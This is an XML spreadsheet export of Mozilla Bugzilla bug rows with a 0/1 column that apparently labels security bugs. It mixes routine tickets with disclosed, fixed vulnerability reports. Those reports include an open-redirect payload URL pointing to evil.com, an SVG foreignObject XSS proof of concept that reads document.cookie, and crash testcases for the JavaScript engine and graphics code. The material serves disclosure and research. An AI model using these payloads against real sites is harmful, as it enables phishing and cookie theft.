3) So now the final URL will be https://pollbot.services.mozilla.com/%0a/evil.com/projectX.htm/ send it to any victim when he clicks on it it will redirect to www.evil.com/projectX.htm
Impact:-
Url Redirection or Unvalidated Open Redirects are usually used with phishing attacks or in malware delivery, it may confuse the end-user on which site they are visiting.
1. Attackers could redirect victims to vulgar sites such as Porn sites which can degrade the reputation of your site, as the redirection happened from your domain.
2. Attackers could deliver malware or phishing pages in the name of your website &amp; hence cab steal user credentials.
As front part, if the URL is legitimate, an attacker can easily convince users to click on maliciously crafted link, and hence could easily target users of pollbot.services.mozilla.com
Actual results:
Application is not validating domains after /%0a/and its leads to open redirect.
Impact:-
Url Redirection or Unvalidated Open Redirects are usually used with phishing attacks or in malware delivery, it may confuse the end user on which site they are visiting .
1. Attackers could redirect victims to vulgar sites such a Porn sites which can degrade the reputation of your site, as the redirection happened from your domain.
2. Attackers could deliver malware or phishing pages in the name of your website &amp; hence cab steal user credentials.
As front part if the url is legitimate, attacker can easily convince users to click on malicious crafted link, and hence could easily target users of pollbot.services.mozilla.com
Video is POC attached below
Reference:-
https://hackerone.com/reports/753399
https://hackerone.com/reports/692154
https://hackerone.com/reports/504751
Mitigation:-
https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
Expected results:
The application should not redirect the user to the malicious domain</t>
        </is>
      </c>
      <c r="X170" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="171">
      <c r="A171" t="n">
        <v>1754522</v>
      </c>
      <c r="B171" t="inlineStr">
        <is>
          <t>2022-02-09 10:40:57 -0800</t>
        </is>
      </c>
      <c r="C171" t="inlineStr">
        <is>
          <t>XSS in SVG's foreignObject with iframe, loaded through a same-origin SVG file from a &lt;use&gt; element</t>
        </is>
      </c>
      <c r="D171" t="inlineStr">
        <is>
          <t>2024-08-12 14:35:32 -0700</t>
        </is>
      </c>
      <c r="E171" t="n">
        <v>1</v>
      </c>
      <c r="F171" t="n">
        <v>1</v>
      </c>
      <c r="G171" t="n">
        <v>3</v>
      </c>
      <c r="H171" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I171" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J171" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K171" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L171" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M171" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N171" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O171" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P171" t="inlineStr">
        <is>
          <t>[keep hidden while 1757210 is][contributes to sec-high website vulns][adv-main99+]</t>
        </is>
      </c>
      <c r="Q171" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R171" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S171" t="inlineStr">
        <is>
          <t>99 Branch</t>
        </is>
      </c>
      <c r="T171" t="n">
        <v>1</v>
      </c>
      <c r="U171" t="n">
        <v>0</v>
      </c>
      <c r="V171" t="n">
        <v>30</v>
      </c>
      <c r="W171" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Steps to reproduce:
Example: https://glitch.com/edit/#!/notch-wood-soap?path=index.html%3A49%3A0
Firefox allows JS injection from SVG's loaded from &lt;use&gt; and &lt;animate&gt; attributes. 
```
    &lt;svg&gt;
      &lt;use&gt;
        &lt;animate attributename="href" keytimes="0;0;1" values="foo;/xss.svg#xss;bar"&gt;&lt;/animate&gt;
      &lt;/use&gt;
    &lt;/svg&gt;
      &lt;svg&gt;
        &lt;use&gt;
          &lt;animate attributename="href" from="/xss.svg#xss" to=""&gt;&lt;/animate&gt;
        &lt;/use&gt;
      &lt;/svg&gt;
      &lt;svg&gt;
        &lt;use&gt;
          &lt;animate attributename="href" dur="1s" to="/xss.svg#xss"&gt;&lt;/animate&gt;
        &lt;/use&gt;
      &lt;/svg&gt;
```
xss.svg:
```
&lt;svg id="xss" xmlns="http://www.w3.org/2000/svg"&gt;;
&lt;foreignObject&gt;
&lt;iframe xmlns="http://www.w3.org/1999/xhtml" srcdoc="&amp;lt;body&amp;gt;&amp;lt;script src=/test2.js&amp;gt;&amp;lt;/script&amp;gt;"&gt;&lt;/iframe&gt;;
&lt;/foreignObject&gt;
&lt;/svg&gt;
```
test2.js:
```
var l = document.createElement("h1");
l.innerText = document.cookie;
l.id="mycookies";
document.body.appendChild(l);
alert(`cookies! ${document.getElementById("mycookies").innerText}`);
```
Actual results:
Firefox loads xss.svg and then the iframe injecting test2.js from srcdoc, printing w/ cookies set in document.cookies.
Expected results:
Chrome and Safari will load the xss.svg without injecting test2 from the iframe's srcdoc.
This currently bypasses our sandboxing framework and gives access to `top.document`.
Note: this concerns would be mitigated the by replacing usage of iframes with ShadowRealms. Although, the injection still persists.</t>
        </is>
      </c>
      <c r="X171" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="172">
      <c r="A172" t="n">
        <v>1541612</v>
      </c>
      <c r="B172" t="inlineStr">
        <is>
          <t>2019-04-03 15:07:52 -0700</t>
        </is>
      </c>
      <c r="C172" t="inlineStr">
        <is>
          <t>Push Health enable retriggers</t>
        </is>
      </c>
      <c r="D172" t="inlineStr">
        <is>
          <t>2019-06-26 11:34:36 -0700</t>
        </is>
      </c>
      <c r="E172" t="n">
        <v>1</v>
      </c>
      <c r="F172" t="n">
        <v>1</v>
      </c>
      <c r="G172" t="n">
        <v>7</v>
      </c>
      <c r="H172" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I172" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J172" t="inlineStr">
        <is>
          <t>Push Health</t>
        </is>
      </c>
      <c r="K172" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L172" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M172" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N172" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O172" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P172" t="inlineStr"/>
      <c r="Q172" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R172" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S172" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T172" t="n">
        <v>1</v>
      </c>
      <c r="U172" t="n">
        <v>0</v>
      </c>
      <c r="V172" t="n">
        <v>3</v>
      </c>
      <c r="W172" t="inlineStr">
        <is>
          <t>Instead of having to go to Treeherder to retrigger a job, you should be able to do so from within Push Health</t>
        </is>
      </c>
      <c r="X172" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="173">
      <c r="A173" t="n">
        <v>1190262</v>
      </c>
      <c r="B173" t="inlineStr">
        <is>
          <t>2015-08-02 23:19:25 -0700</t>
        </is>
      </c>
      <c r="C173" t="inlineStr">
        <is>
          <t>Sync button spins forever while user is not verified.</t>
        </is>
      </c>
      <c r="D173" t="inlineStr">
        <is>
          <t>2015-12-28 06:49:32 -0800</t>
        </is>
      </c>
      <c r="E173" t="n">
        <v>1</v>
      </c>
      <c r="F173" t="n">
        <v>1</v>
      </c>
      <c r="G173" t="n">
        <v>2</v>
      </c>
      <c r="H173" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I173" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J173" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K173" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N173" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O173" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P173" t="inlineStr">
        <is>
          <t>[fxsync]</t>
        </is>
      </c>
      <c r="Q173" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R173" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S173" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T173" t="n">
        <v>1</v>
      </c>
      <c r="U173" t="n">
        <v>0</v>
      </c>
      <c r="V173" t="n">
        <v>13</v>
      </c>
      <c r="W173" t="inlineStr">
        <is>
          <t>When you start the browser with an unverified user, the Sync button starts spinning as Sync initializes, and remains spinning until the user is verified. As browserid_identity uses whenVerified as part of the login process the login never actually completes until verification.
This seems less than ideal - we should probably arrange for bid_identity to not wait and instead "cleanly and silently" refuse to continue. Or maybe even have browser-syncui not spin the icon during login?</t>
        </is>
      </c>
      <c r="X173" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="174">
      <c r="A174" t="n">
        <v>1422396</v>
      </c>
      <c r="B174" t="inlineStr">
        <is>
          <t>2017-12-01 12:12:49 -0800</t>
        </is>
      </c>
      <c r="C174" t="inlineStr">
        <is>
          <t>Add UI event telemetry probes</t>
        </is>
      </c>
      <c r="D174" t="inlineStr">
        <is>
          <t>2017-12-12 12:37:55 -0800</t>
        </is>
      </c>
      <c r="E174" t="n">
        <v>1</v>
      </c>
      <c r="F174" t="n">
        <v>1</v>
      </c>
      <c r="G174" t="n">
        <v>2</v>
      </c>
      <c r="H174" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I174" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J174" t="inlineStr">
        <is>
          <t>Telemetry</t>
        </is>
      </c>
      <c r="K174" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L174" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M174" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N174" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O174" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P174" t="inlineStr"/>
      <c r="Q174" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R174" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S174" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T174" t="n">
        <v>1</v>
      </c>
      <c r="U174" t="n">
        <v>0</v>
      </c>
      <c r="V174" t="n">
        <v>5</v>
      </c>
      <c r="W174" t="inlineStr">
        <is>
          <t>Now that we have support for the `mobile-event` ping format, we need to update Firefox for iOS to add probes to record and send these events.</t>
        </is>
      </c>
      <c r="X174" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="175">
      <c r="A175" t="n">
        <v>676355</v>
      </c>
      <c r="B175" t="inlineStr">
        <is>
          <t>2011-08-03 12:56:39 -0700</t>
        </is>
      </c>
      <c r="C175" t="inlineStr">
        <is>
          <t>Change webapp navigation to reflect new version options</t>
        </is>
      </c>
      <c r="D175" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E175" t="n">
        <v>1</v>
      </c>
      <c r="F175" t="n">
        <v>1</v>
      </c>
      <c r="G175" t="n">
        <v>4</v>
      </c>
      <c r="H175" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I175" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J175" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K175" t="inlineStr">
        <is>
          <t>1.7</t>
        </is>
      </c>
      <c r="L175" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M175" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N175" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O175" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P175" t="inlineStr"/>
      <c r="Q175" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R175" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S175" t="inlineStr">
        <is>
          <t>2.2</t>
        </is>
      </c>
      <c r="T175" t="n">
        <v>1</v>
      </c>
      <c r="U175" t="n">
        <v>0</v>
      </c>
      <c r="V175" t="n">
        <v>13</v>
      </c>
      <c r="W175" t="inlineStr">
        <is>
          <t>Right now the version dropdown is pre-filled with version values.  This needs to change to reflect the new aggregation criteria, so each beta will have its own link, which should be named as e.g. 6.0b1, 6.0b2, etc.
You should be able to get this information from the productdims table, although I'm not dead sure exactly what jberkus has implemented in the end - please check in with he and rhelmer.
If you can, putting this in middleware would be a Good Thing to do too.  Right now it's just more SQL in the webapp.  Consult lonnen for advice and assistance if needed.</t>
        </is>
      </c>
      <c r="X175" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" t="n">
        <v>1213899</v>
      </c>
      <c r="B176" t="inlineStr">
        <is>
          <t>2015-10-12 08:53:55 -0700</t>
        </is>
      </c>
      <c r="C176" t="inlineStr">
        <is>
          <t>Drop the device table, reference_data_signatures.device_name and job.device_id</t>
        </is>
      </c>
      <c r="D176" t="inlineStr">
        <is>
          <t>2015-11-26 06:38:18 -0800</t>
        </is>
      </c>
      <c r="E176" t="n">
        <v>1</v>
      </c>
      <c r="F176" t="n">
        <v>1</v>
      </c>
      <c r="G176" t="n">
        <v>7</v>
      </c>
      <c r="H176" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I176" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J176" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K176" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N176" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O176" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P176" t="inlineStr"/>
      <c r="Q176" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R176" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S176" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T176" t="n">
        <v>1</v>
      </c>
      <c r="U176" t="n">
        <v>0</v>
      </c>
      <c r="V176" t="n">
        <v>6</v>
      </c>
      <c r="W176" t="inlineStr">
        <is>
          <t>Once bug 1211715 is in production, we can drop:
* the per-project device table
* treeherder.reference_data_signatures.device_name
* treeherder.job.device_id</t>
        </is>
      </c>
      <c r="X176" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" t="n">
        <v>1306628</v>
      </c>
      <c r="B177" t="inlineStr">
        <is>
          <t>2016-09-30 07:43:12 -0700</t>
        </is>
      </c>
      <c r="C177" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in AAHairlineBatch::onPrepareDraws</t>
        </is>
      </c>
      <c r="D177" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:05 -0700</t>
        </is>
      </c>
      <c r="E177" t="n">
        <v>1</v>
      </c>
      <c r="F177" t="n">
        <v>1</v>
      </c>
      <c r="G177" t="n">
        <v>3</v>
      </c>
      <c r="H177" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I177" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J177" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K177" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L177" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M177" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N177" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O177" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P177" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main50.1+]</t>
        </is>
      </c>
      <c r="Q177" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R177" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S177" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T177" t="n">
        <v>1</v>
      </c>
      <c r="U177" t="n">
        <v>0</v>
      </c>
      <c r="V177" t="n">
        <v>36</v>
      </c>
      <c r="W177" t="inlineStr">
        <is>
          <t>Created attachment 8796563
firefox-heap-buffer-overflow-add_line.html
Tested on:
OS: Ubuntu 16.04.1 LTS
Firefox: moz_source_stamp: f713114b8c8d352b668b3e8052bc51ece4df34e0
ASAN-trace:
==6370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fb8bec14003 at pc 0x7fb8cdf9c78a bp 0x7ffc4226db70 sp 0x7ffc4226db68
WRITE of size 8 at 0x7fb8bec14003 thread T0
    #0 0x7fb8cdf9c789 in add_line /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/batches/GrAAHairLinePathRenderer.cpp:592:25
    #1 0x7fb8cdf9c789 in AAHairlineBatch::onPrepareDraws(GrVertexBatch::Target*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/batches/GrAAHairLinePathRenderer.cpp:861
    #2 0x7fb8ce2a9799 in GrVertexBatch::onPrepare(GrBatchFlushState*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/batches/GrVertexBatch.cpp:19:5
    #3 0x7fb8ce1ca790 in prepare /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/batches/GrBatch.h:109:46
    #4 0x7fb8ce1ca790 in GrDrawTarget::prepareBatches(GrBatchFlushState*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/GrDrawTarget.cpp:202
    #5 0x7fb8ce1db713 in GrDrawingManager::flush() /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/GrDrawingManager.cpp:77:9
    #6 0x7fb8ce1c73a1 in flush /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/GrContext.cpp:237:9
    #7 0x7fb8ce1c73a1 in GrContext::prepareSurfaceForExternalIO(GrSurface*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/gpu/GrContext.cpp:537
    #8 0x7fb8c6aaf1d4 in mozilla::layers::PersistentBufferProviderBasic::ReturnDrawTarget(already_AddRefed&lt;mozilla::gfx::DrawTarget&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/layers/PersistentBufferProvider.cpp:46:5
    #9 0x7fb8c948f28b in mozilla::dom::CanvasRenderingContext2D::ReturnTarget() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1767:5
    #10 0x7fb8c9494016 in mozilla::dom::CanvasRenderingContext2D::OnStableState() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1499:3
    #11 0x7fb8c9550a22 in applyImpl&lt;mozilla::dom::CanvasRenderingContext2D, void (mozilla::dom::CanvasRenderingContext2D::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #12 0x7fb8c9550a22 in apply&lt;mozilla::dom::CanvasRenderingContext2D, void (mozilla::dom::CanvasRenderingContext2D::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #13 0x7fb8c9550a22 in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::dom::CanvasRenderingContext2D::*)(), true, false&gt;::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
.
.
.
0x7fb8bec14003 is located 6141 bytes to the left of 140400-byte region [0x7fb8bec15800,0x7fb8bec37c70)
allocated by thread T0 here:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x4e0d7d in moz_xrealloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:105:20
    #2 0x7fb8ce56eefe in makeSpace /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/include/core/SkPathRef.h:424:46
    #3 0x7fb8ce56eefe in SkPathRef::growForVerb(int, float) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/core/SkPathRef.cpp:439
    #4 0x7fb8ce552bce in growForVerb /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/include/core/SkPathRef.h:73:20
    #5 0x7fb8ce552bce in SkPath::moveTo(float, float) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/skia/skia/src/core/SkPath.cpp:731
    #6 0x7fb8c85f18b1 in MoveTo /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:306:7
    #7 0x7fb8c85f18b1 in mozilla::dom::CanvasRenderingContext2DBinding::moveTo(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:6060
.
.
.</t>
        </is>
      </c>
      <c r="X177" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="178">
      <c r="A178" t="n">
        <v>1240880</v>
      </c>
      <c r="B178" t="inlineStr">
        <is>
          <t>2016-01-19 12:28:09 -0800</t>
        </is>
      </c>
      <c r="C178" t="inlineStr">
        <is>
          <t>Assertion failure: consumer-&gt;isConsistentFloat32Use(use.use()), at js/src/jit/IonAnalysis.cpp:1791</t>
        </is>
      </c>
      <c r="D178" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:12 -0700</t>
        </is>
      </c>
      <c r="E178" t="n">
        <v>1</v>
      </c>
      <c r="F178" t="n">
        <v>1</v>
      </c>
      <c r="G178" t="n">
        <v>3</v>
      </c>
      <c r="H178" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I178" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J178" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K178" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L178" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M178" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N178" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O178" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P178" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q178" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R178" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S178" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T178" t="n">
        <v>1</v>
      </c>
      <c r="U178" t="n">
        <v>0</v>
      </c>
      <c r="V178" t="n">
        <v>17</v>
      </c>
      <c r="W178" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision b67316254602 (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --no-threads --ion-eager):
function f(x) {
    "use strict";
    Math.fround(this === x &amp;&amp; x);
}
f();
f();
(function() {
    f(Math.fround(0));
})();
Backtrace:
0   js-dbg-64-dm-darwin-b67316254602	0x0000000100232e64 js::jit::ApplyTypeInformation(js::jit::MIRGenerator*, js::jit::MIRGraph&amp;) + 6068 (IonAnalysis.cpp:1791)
1   js-dbg-64-dm-darwin-b67316254602	0x000000010022a50b js::jit::OptimizeMIR(js::jit::MIRGenerator*) + 1835 (Ion.cpp:1634)
2   js-dbg-64-dm-darwin-b67316254602	0x0000000100235f53 js::jit::CompileBackEnd(js::jit::MIRGenerator*) + 67 (Ion.cpp:2011)
3   js-dbg-64-dm-darwin-b67316254602	0x000000010023804b js::jit::Compile(JSContext*, JS::Handle&lt;JSScript*&gt;, js::jit::BaselineFrame*, unsigned char*, bool, bool) + 4587 (Ion.cpp:2282)
4   js-dbg-64-dm-darwin-b67316254602	0x00000001002389b2 js::jit::CanEnter(JSContext*, js::RunState&amp;) + 370 (Ion.cpp:2614)
5   js-dbg-64-dm-darwin-b67316254602	0x0000000100703f61 js::RunScript(JSContext*, js::RunState&amp;) + 289 (Interpreter.cpp:405)
6   js-dbg-64-dm-darwin-b67316254602	0x00000001006f21b9 js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) + 841 (Interpreter.cpp:499)
7   js-dbg-64-dm-darwin-b67316254602	0x000000010071b4db js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) + 555 (Interpreter.cpp:533)
8   js-dbg-64-dm-darwin-b67316254602	0x0000000100197ddf js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) + 2655 (BaselineIC.cpp:6186)
9   ???                           	0x0000000102a213ab 0 + 4339143595
10  ???                           	0x0000000103e54d58 0 + 4360326488
Setting s-s as a start as this seems to involve MIR.</t>
        </is>
      </c>
      <c r="X178" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" t="n">
        <v>1591019</v>
      </c>
      <c r="B179" t="inlineStr">
        <is>
          <t>2019-10-24 02:13:47 -0700</t>
        </is>
      </c>
      <c r="C179" t="inlineStr">
        <is>
          <t>Assertion failure: adjustedExponent &gt;= mozilla::FloorLog2(mozilla::Abs(upper_)), at js/src/jit/RangeAnalysis.h:240</t>
        </is>
      </c>
      <c r="D179" t="inlineStr">
        <is>
          <t>2022-01-10 05:47:17 -0800</t>
        </is>
      </c>
      <c r="E179" t="n">
        <v>1</v>
      </c>
      <c r="F179" t="n">
        <v>1</v>
      </c>
      <c r="G179" t="n">
        <v>3</v>
      </c>
      <c r="H179" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I179" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J179" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K179" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L179" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M179" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N179" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O179" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P179" t="inlineStr">
        <is>
          <t>[jsbugmon:update][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q179" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R179" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S179" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T179" t="n">
        <v>1</v>
      </c>
      <c r="U179" t="n">
        <v>0</v>
      </c>
      <c r="V179" t="n">
        <v>9</v>
      </c>
      <c r="W179" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision ad7a152bc66c (build with --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off --ion-warmup-threshold=0 --baseline-eager --ion-gvn=off):
    "foo".charAt(3.4);
    for (name of []) {}
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  js::jit::Range::assertInvariants (this=this@entry=0x7ffff5fa51e0) at js/src/jit/RangeAnalysis.h:240
    #1  0x000055555653b658 in js::jit::Range::refineToExcludeNegativeZero (this=0x7ffff5fa51e0) at js/src/jit/RangeAnalysis.h:589
    #2  js::jit::Range::toIntegerInt32 (alloc=..., op=op@entry=0x7fffffffbef0) at js/src/jit/RangeAnalysis.cpp:1220
    #3  0x000055555653d2a2 in js::jit::MToIntegerInt32::computeRange (this=0x7ffff5f9b3e8, alloc=...) at js/src/jit/RangeAnalysis.cpp:1727
